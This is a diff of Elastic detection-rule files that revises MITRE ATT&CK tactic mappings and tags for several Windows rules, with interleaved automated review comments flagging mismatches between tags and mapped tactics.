 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique.subtechnique]]
+id = "T1071.004"
+name = "DNS"
+reference = "https://attack.mitre.org/techniques/T1071/004/"
+
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml
index b0a36b60dc8..71301265659 100644
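Review bot: The `@@ -119,18 +131,31 @@` hunk removes the `T1016.001` (`Internet Connection Discovery`) sub-technique and adds a `T1071.004` (`DNS`) block under `TA0011` / `Command and Control`, with the matching `"Tactic: Command and Control"` tag in the earlier hunk. T1071.004 describes DNS used as a command-and-control channel, whereas a DNS query to a public-IP lookup service — the behavior the rule name and the retained `references = ["https://attack.mitre.org/techniques/T1016/"]` point at — is what T1016.001 covers, so this looks like a loss of precision rather than a refinement; confirm the intent before widening the tactic set. If the C2 mapping is kept, a sentence in the rule description explaining why resolution of a lookup service is treated as C2 would help analysts triaging the alert.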
--- a/rules/windows/discovery_posh_invoke_sharefinder.toml
+++ b/rules/windows/discovery_posh_invoke_sharefinder.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/17"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 [rule]
 author = ["Elastic"]
@@ -114,7 +114,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Tactic: Collection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: PowerShell Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -137,16 +146,51 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1135"
 name = "Network Share Discovery"
 reference = "https://attack.mitre.org/techniques/T1135/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1039"
+name = "Data from Network Shared Drive"
+reference = "https://attack.mitre.org/techniques/T1039/"
+
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml
index 4ab7a7dd03b..4fa1272e100 100644
--- a/rules/windows/discovery_posh_suspicious_api_functions.toml
+++ b/rules/windows/discovery_posh_suspicious_api_functions.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/13"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 [rule]
 author = ["Elastic"]
@@ -106,7 +106,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Tactic: Collection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: PowerShell Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -156,41 +165,25 @@ case_insensitive = true
 value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
-
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1069.001"
 name = "Local Groups"
 reference = "https://attack.mitre.org/techniques/T1069/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1069.002"
-name = "Domain Groups"
-reference = "https://attack.mitre.org/techniques/T1069/002/"
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.001"
 name = "Local Account"
 reference = "https://attack.mitre.org/techniques/T1087/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1087.002"
-name = "Domain Account"
-reference = "https://attack.mitre.org/techniques/T1087/002/"
 [[rule.threat.technique]]
 id = "T1135"
@@ -202,10 +195,46 @@ id = "T1482"
 name = "Domain Trust Discovery"
 reference = "https://attack.mitre.org/techniques/T1482/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1039"
+name = "Data from Network Shared Drive"
+reference = "https://attack.mitre.org/techniques/T1039/"
+
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml
index 14d4432265c..0c166da5fd0 100644
--- a/rules/windows/discovery_whoami_command_activity.toml
+++ b/rules/windows/discovery_whoami_command_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "system", "windows", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -117,18 +117,14 @@ process where host.os.type == "windows" and event.type == "start" and process.na
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1033"
 name = "System Owner/User Discovery"
 reference = "https://attack.mitre.org/techniques/T1033/"
-[[rule.threat.technique]]
-id = "T1069"
-name = "Permission Groups Discovery"
-reference = "https://attack.mitre.org/techniques/T1069/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
index d025ed0e6f3..74799bd0dbd 100644
--- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
+++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/14"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,21 @@ references = [
 risk_score = 47
 rule_id = "d72e33fc-6e91-42ff-ac8b-e573268c5a87"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Initial Access",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -86,12 +100,10 @@ process.parent.name: (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
@@ -102,7 +114,27 @@ id = "T1059.003"
 name = "Windows Command Shell"
 reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
+[[rule.threat.technique.subtechnique]]
+id = "T1195.002"
+name = "Compromise Software Supply Chain"
+reference = "https://attack.mitre.org/techniques/T1195/002/"
+
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
index 59cb3fe1d9f..548fd088051 100644
--- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
+++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/14"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -57,7 +57,16 @@ references = [
 risk_score = 47
 rule_id = "93b22c0a-06a0-4131-b830-b10d5e166ff4"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
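Review bot: `"Tactic: Initial Access"` is dropped from `tags` in the `@@ -57,7 +57,16 @@` hunk, but the next hunk keeps the `[[rule.threat]]` block whose tactic is `TA0001` / `"Initial Access"` (T1195 / T1195.002), so the rule's tags no longer cover its mapped tactics. Either restore `"Tactic: Initial Access",` after `"Tactic: Execution",` in the tag list, or remove the T1195 block if that mapping is no longer wanted; as written, a tactic-to-tag consistency check would flag this file. The same mismatch appears in `execution_command_prompt_connecting_to_the_internet.toml`, where `"Tactic: Command and Control"` leaves the tags while the `TA0011` block with T1105 stays in the threat mapping.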
@@ -87,36 +96,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1569"
-name = "System Services"
-reference = "https://attack.mitre.org/techniques/T1569/"
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
-[[rule.threat.technique.subtechnique]]
-id = "T1569.002"
-name = "Service Execution"
-reference = "https://attack.mitre.org/techniques/T1569/002/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
+
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml
index fa047e4e93e..c7deeed356b 100644
--- a/rules/windows/execution_com_object_xwizard.toml
+++ b/rules/windows/execution_com_object_xwizard.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/20"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/28"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,20 @@ references = [
 risk_score = 47
 rule_id = "1a6075b0-7479-450e-8fe7-b8b8438ac570"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -92,31 +105,19 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1559"
 name = "Inter-Process Communication"
 reference = "https://attack.mitre.org/techniques/T1559/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1559.001"
 name = "Component Object Model"
 reference = "https://attack.mitre.org/techniques/T1559/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
index f9e4f0e18a5..764af8ffaf6 100644
--- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
+++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/23"
 [rule]
 author = ["Elastic"]
@@ -100,7 +100,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana-
 risk_score = 21
 rule_id = "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+]
 type = "eql"
 query = '''
@@ -125,39 +134,29 @@ sequence by process.entity_id with maxspan=15s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml
index 96e430f08d1..6424adbe5c9 100644
--- a/rules/windows/execution_command_shell_started_by_svchost.toml
+++ b/rules/windows/execution_command_shell_started_by_svchost.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/29"
 [transform]
 [[transform.osquery]]
@@ -132,31 +132,17 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
-
-[[rule.threat.technique]]
-id = "T1569"
-name = "System Services"
-reference = "https://attack.mitre.org/techniques/T1569/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1569.002"
-name = "Service Execution"
-reference = "https://attack.mitre.org/techniques/T1569/002/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.command_line"]
diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml
index 3dc455db3cd..3db3ebe2ccf 100644
--- a/rules/windows/execution_command_shell_started_by_unusual_process.toml
+++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/21"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -114,18 +114,14 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml
index b4ad329ff0c..c0273819d72 100644
--- a/rules/windows/execution_command_shell_via_rundll32.toml
+++ b/rules/windows/execution_command_shell_via_rundll32.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/19"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,20 @@ RunDLL32 is a legitimate Windows utility used to execute functions in DLLs, ofte
 risk_score = 21
 rule_id = "9ccf3ce0-0057-440a-91f5-870c6ad39093"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Credential Access",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -74,30 +87,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -108,7 +101,39 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml index a09a3c65442..c728a7ba058 100644 
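Review bot: The new `[[rule.threat]]` entry mapping `T1552` Unsecured Credentials under `TA0006` Credential Access is hard to reconcile with a rule named for command shells launched via rundll32; nothing in the hunk references credential material, and the query is outside it, so the mapping reads as a mis-assignment. Unless the query was extended to match credential-file access, drop this entry together with the `"Tactic: Credential Access",` tag added in the hunk above so tags and mapping stay aligned. The `T1218.011` Rundll32 entry is only moved, not changed, so that part looks fine.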
--- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml +++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/11" [rule] author = ["Elastic"] @@ -103,21 +103,41 @@ sequence by process.parent.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1216" +name = "System Script Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1216/" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" [[rule.threat.technique.subtechnique]] id = "T1218.004" @@ -144,6 +164,7 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" 
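Review bot: `T1127.001` MSBuild is replaced in the Defense Evasion entry by `T1216` and `T1218.003` CMSTP, so any msbuild.exe clause the query (outside the hunk) still carries is no longer mapped. The following hunk in this file then deletes the old Execution entry including `T1047` Windows Management Instrumentation, which the new Execution entry with `T1059.001`/`T1059.005` does not restore. If the query still matches msbuild.exe or wmic.exe children of ping, keep `T1127.001` in the Defense Evasion entry and add `T1047` back to the new Execution entry; the intent is not visible from the hunk, so please confirm against the query.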
@@ -153,36 +174,15 @@ reference = "https://attack.mitre.org/techniques/T1220/" id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" - [[rule.threat.technique.subtechnique]] id = "T1497.003" name = "Time Based Checks" reference = "https://attack.mitre.org/techniques/T1497/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml index 9adeb9ceb50..d4347a8e04b 100644 --- a/rules/windows/execution_downloaded_shortcut_files.toml +++ b/rules/windows/execution_downloaded_shortcut_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -18,7 +18,14 @@ name = "Downloaded Shortcut Files" risk_score = 47 rule_id = "39157d52-4035-44a8-9d1a-6f8c5f580a07" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -63,18 +70,41 @@ Shortcut files (.lnk) are used in Windows environments to link to executable fil [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" 